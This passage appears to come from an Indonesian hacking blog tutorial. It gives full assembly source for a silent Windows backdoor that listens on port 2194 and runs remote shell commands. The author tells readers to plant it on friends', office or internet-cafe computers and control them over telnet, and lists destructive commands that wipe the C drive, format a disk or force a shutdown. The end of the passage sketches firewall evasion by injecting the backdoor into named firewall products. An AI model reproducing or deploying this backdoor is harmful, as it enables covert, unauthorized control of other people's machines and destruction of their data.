jz msgbox ; apakah perintah msgbox ?
push offset Perintah2
push edi
call lstrcmpi
or eax,eax ; apakah perintah close ?
jz mati
push offset Perintah3
push edi
call lstrcmpi
or eax,eax ; apakah perintah shell ?
jz shell
xor eax,eax ; perintah gak ada yang cocok
ret ; kembali dan tampilkan pesan
msgbox:
mov eax,MB_OK
or eax,MB_SYSTEMMODAL
or eax,MB_TOPMOST
push eax
push offset AppName
push arg
push 0
call MessageBox
jmp retCmd
mati:
push offset szSelesai
call lstrlen
mov lenn,eax
; tampilkan pesan selesai
push 0
push lenn
push offset szSelesai
push sock2
call send
; tutup socket
push sock1
call closesocket
push sock2
call closesocket
; bersihkan memori
call WSACleanup
xor eax,eax
push 0
call ExitProcess
shell:
; cari untuk argumen ke 2 atau sub commandline
mov arg2,0
mov edi,arg
mov ecx,512
mov al,20h ; 20h = spasi
repnz scasb
cmp ecx,0 ; spasi ditemukan ?
je no_arg2 ; jika tidak goto no_arg2
dec edi
mov byte ptr [edi],0 ; ada, nullkan
inc edi
mov arg2,edi ; simpan arg2 ke memori
no_arg2:
push 1
push 0
push arg2
push arg
push offset szOpen
push 0
call ShellExecuteA ; eksekusi!
jmp retCmd
retCmd:
mov al,1
ret
Tarjim endp
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
start:
call StartUp ; panggil prosedur startup
test eax,eax ; apakah socket oke?
jz socket_error ; jika tidak socket = error
; socket dah oke
; buat listening ke port 2194
push 1
push sock1
call listen
new_session:
push sock2 ; tutup socket 2
call closesocket ; berfungsi setelah looping
mov eax,sizeof sockaddr_in
mov lenn,eax
push offset lenn
push offset sockin2
push sock1
call accept ; menunggu perintah dari socket 2
mov sock2,eax ; simpan alamat socket 2
push offset szLogon
call lstrlen
mov lenn,eax
push 0
push lenn
push offset szLogon
push sock2
call send ; sambut tamu dari luar :)
mov eax,sockin2.sin_addr
push eax
call inet_ntoa ; terjemahkan IP x.x.x.x
mov s2IP,eax ; simpan IP dari socket 2
push offset szKonek
push offset Buffer
call lstrcpy
lea edi,Buffer
push edi
or ecx,-1
mov al,03Ah ; cari karakter ':'
repnz scasb
inc edi
; tempelkan string IP
push s2IP
push edi
call lstrcpy
push edi
call lstrlen
add edi,eax
mov word ptr [edi],0a0dh ; ganti baris
add edi,2
mov byte ptr [edi],0 ; null
pop edi
push edi
call lstrlen
mov lenn,eax
push 0
push lenn
push offset Buffer
push sock2
call send ; tampilkan string Connected : x.x.x.x -> IP address
push 0
mov eax, sizeof szMasuk
push eax
push offset szMasuk
push sock2
call send ; welcome :)
perintah:
push 0
push 10
push offset szPerintah
push sock2
call send ; backdoor siap dikendalikan!
push 512
push offset Buffer2
call BersihkanBuffer ; Bersihkan buffer
lea edi,Buffer2
mov KeepOF,0 ; counter anti buffer overflow
tunggu_perintah:
invoke recv,sock2,edi,500,0
test eax,eax
jz new_session
cmp eax,SOCKET_ERROR
je new_session
add edi,eax
inc KeepOF
cmp KeepOF,511
jb no_of ; jika penuisan buffer hampir mencapai 512 byte
jmp perintah ; bersihkan buffer, jaga2 biar gak terjadi
no_of: ; Buffer overflow :-)
cmp byte ptr [edi-1],08h
jne bkn_backs
xor eax,eax
mov word ptr [edi],ax
sub edi,2
bkn_backs:
cmp byte ptr [edi-1],0ah ; apakah tombol enter yang ditekan ?
jnz tunggu_perintah ; jika nggak masih nunggu perintah
; ya, terjemahkan perintah
push offset Buffer2
call Tarjim ; panggil prosedur tarjim
test eax,eax ; apakah perintah valid
jnz perintah ; jika tidak balik tungu perintah
cmp eax,2 ; apakah perintah kosong ?
je kosong ; jika ya, goto kosong
push 0
mov eax,sizeof szPerintahX
push eax
push offset szPerintahX
push sock2
call send ; tampilkan pesan kalo perintah nggak ada
jmp perintah
kosong:
push 0
push 2
push offset szKosong
push sock2
call send ; hanya ganti baris
jmp perintah
socket_error: ; trap handel jika-jika socket error
push MB_ICONERROR
push offset AppName
push offset szSocketError
push 0
call MessageBox ; tampilkan kesalahan
tamat:
push 0
call ExitProcess ; selesai.
end start
================[ EOF ]=========================================
atau kalo males ngompilasi sendiri, ini contoh yang udah jadi:
kalo udah coba test hasilnya, jalankan backdoor.exe dikomputer target, misal komputer teman, kantor, warnet (komputer operator lho) atau komputer pribadi, backdoor ini saya desain silent jadi kamu gak bakalan nemuin jendela macam-macam, tapi kalo kamu pake firewall pasti akan ketahuan kalo backdoor.exe telah membuka port.
setelah langkah diatas selesai kita akan melakukan telnet ke komputer target, kita bisa pake komputer lain, untuk menjalankan telnet caranya klik start>run> ketik “cmd” tanpa tanda kutip. s
pada jendela konsol ketikkan “telnet x.x.x.x 2194” tanpa tanda kutip, x.x.x.x disini maksudnya IP target, contoh “telnet 192.168.0.3 2194”, 2194 disini maksudnya port yang akan kita masuki (untuk contoh backdoor ini aku gunakan port 2194).
tekan “Enter”
nah kalo dah gitu kita udah bisa mengendalikan komputer target dari jarak jauh, maksud seperti contoh gambar diatas adalah backdoor sudah siap melakukan perintah, ada 3 perintah yang dikenal oleh backdoor ini :
msgbox (untuk menampilkan pesan ke komputer target)
shell (untuk menjalankan aplikasi di komputer sasaran)
close (untuk menutup hubungan dan mematikan backdoornya)
perintah diatas bisa ditambah sendiri tergantung kreatifitas kamu.
backdoor bisa menyenangkan jika digunakan untuk mengerjai temen yang lagi ol . :)
cara menjalankan perintah cukup ketikkan perintah diatas pada jendela konsol, misal kita akan menampilkan pesan ke komputer target, tinggal ketikkan:
“msgbox hallo, komputer kamu dibawah kendaliku” tanpa tanda kutip, maka pada komputer target akan muncul jendela box
atau ingin memainkan musik ke komputer target dengan catatan kita tahu tempat musik yang akan kita mainkan, contoh:
“shell d:\musik ku\dream theater – endless sacrifice.mp3”
maka dikomputer target akan memainkan musik yang merdu.
atau ingin mematikan komputer target yang berbasis Wind**s 2000 keatas, dengan cara:
“shell shutdown –s –t 0 –f”
untuk merestart tinggal ganti “-s” jadi –“r” contoh:
“shell shutdown –r –t 0 –f”
Backdoor bisa menjadi sangat berbahaya jika yang dijalankan adalah perintah-perintah seperti:
“shell del /f /q /s c:\*.*” (perintah untuk menghapus semua data tanpa konfirmasi)
“shell format d: /q” (perintah untuk memformat hardisk)
note: mohon agar cotoh program backdoor ini tidak digunakan untuk tindakan-tindakan yang merusak. :D
setelah selesai menggunakan backdoor kita bisa tutup dengan mengetikkan perintah “close”, maka backdoor di komputer target akan bunuh diri.
Cara di atas akan sia-sia apabila komputer target memasang firewall, kita perlu menambahkan kode anti firewall detection untuk menghindari deteksi dari firewall. kode anti firewall detection yang saya ketahui adalah dengan cara tehnik runtime process infection, dimana kita akan menginjeksi kode backdoor ke tubuh firewall (hampir mirip kayak DLL injection) yang sedang resident lalu meremote-nya misal pake API CreateRemoteThread, sehingga firewall akan mengangapnya sebagai sumber yang dipercaya, karena nggak mungkin firewall mencurigai dirinya sendiri sebagai backdoor :”D, Adapun beberapa firewall yang vulnerable terhadap serangan ini adalah:
1. Zone Alarm 4
2. Zone Alarm Pro 4
3. BlackIce 3
Pada pengujian yang saya lakukan, ke tiga firewall tersebut diatas bisa ditembus sistem keamanannya dan berhasil menjalankan backdoor tanpa gangguan :). tapi entahlah untuk jenis firewall lain, karena saya cuma menguji 3 firewall diatas. :P
Untuk menambahkan tehnik ini kamu perlu pengetahuan dan dasar-dasar pemrograman yang cukup.
Last word
Saya hanyalah seorang biasa yang masih sangat awam dibidang IT, jadi mohon ma’af apabila saya telah melakukan kesalahan yang mungkin disebabkan karena ketidakpahaman saya atau kebodohan saya.
Untuk yang udah pada ahli, jangan pelit bagi-bagi ilmu ya..
Thanks to
Allah SWT, Rosululloh SAW, Ayah Ibu tercinta, saudara-sudaraku, teman-temanku: Sh1bed, 4rf@d, It0, Izudien, Am1n, Pak Sur, 1rh4m, n4j1b, zulfa, tomero, ScareByte, NemeSiS_Byte, djiamput_cok, mas Irwan, B0rg0L, lamer, skywalker, and all friends in international assembly community.
Jasakom atas postingan artikelnya, teman-teman komunitas Jasakom yang lagi pada rewel :). s’to atas buku-bukunya, spesial untuk My Angel:Ans, atas cinta dan kasih sayangnya.
Subscribe to:
Posts (Atom)
